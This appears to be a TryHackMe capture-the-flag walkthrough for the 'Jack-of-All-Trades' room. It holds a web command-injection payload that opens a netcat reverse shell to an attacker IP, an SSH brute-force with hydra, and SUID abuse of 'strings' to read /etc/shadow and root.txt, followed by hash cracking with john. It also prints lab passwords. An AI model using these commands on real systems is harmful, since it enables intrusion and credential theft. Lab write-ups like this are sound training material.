Jack-of-All-Trades
Room Link: https://tryhackme.com/room/jackofalltrades
Initial Scan
For some reason they switched port 22 with http site and 80 with ssh
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/22 - HTTP
gobuster dir -u http://$VICTIM:22 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Had to all the override to see the site on port 22 in firefox
There is a stegosaurus picture on the home page so it is hinting that there's something in one of the pictures, eventually we find jackinthebox username and password in one of the pictures.
Kali
steghide extract -sf stego.jpg
Password: u?WtKSraq
steghide extract -sf header.jpg
Password: u?WtKSraq
If you run a command like this you can't see the results unless you view the source.
Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami
Kali
nc -lvnp 1337Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337
Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgIn the home directory there is a password list, it's small enough so I copied and pasted into a file on Kali.
Kali
hydra -s 80 -l jack -P passwords.txt $VICTIM -t4 ssh
Kali
ssh jack@$VICTIM -p 80
Password: ITMJpGGIqg1jn?>@
PSPY
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81Victim
cd /tmp
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32 Strings as the SUID-bit set which means we can run it against files we normally wouldn't be able to read. I tried getting roots password but it was taking too long.
Victim
find / -perm -u=s -type f 2> /dev/null
/usr/bin/strings /etc/shadow
/usr/bin/strings /etc/passwdKali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txtI just ended up using strings to read the root.txt
Kali
/usr/bin/strings /root/root.txt
Last updated